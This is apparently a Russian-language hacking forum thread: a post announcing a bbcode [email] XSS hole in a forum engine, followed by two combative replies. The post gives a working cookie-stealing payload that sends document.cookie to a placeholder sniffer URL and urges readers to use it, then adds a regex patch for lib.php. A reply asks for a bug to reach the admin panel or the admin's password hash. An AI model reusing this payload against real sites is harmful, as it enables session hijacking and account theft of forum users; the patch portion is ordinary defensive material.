Ахтунг! Недавно в инете появилась инфа о xss в bbcode url, разрабочтик исправил ошибку, но как оказалось не везде =) И так поехали. Сразу предупрежу, что данная бага работает только в Internet Explorer . Суть состоит в том, что одна из форм записи bbcode email пропускает нужные нам символы, что позволяет выйти за пределы тега. Вот пример XSS Code: [ email]'style='display:none;background:url(javascript:document.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email] Думаю, что где и как все это работает объяснять не надо. Так что дерзайте =) А теперь инфа добропорядочным юзерам. Раз разработчик думать не хочет, бум думать за него =) Открываем файл lib.php и в примерно в 588 строке находим такой код Code: $post = preg_replace( "#\[email\](\S+?)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post ); и заменяем его на Code: $post = preg_replace( "#\[email\]([a-z0-9&\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post ); За сим усе.
хм, ну тогда если ты самый умный то найди багу через которую можно залезть в админ панель или получить хеш админа (разумееться чтоб бага работала на форуме в который админ просто не заходит)...
White Jordan какие проблемы? Почему ты не нашел багу и не выложил ее, не сделал видео? ты хуже идиота?
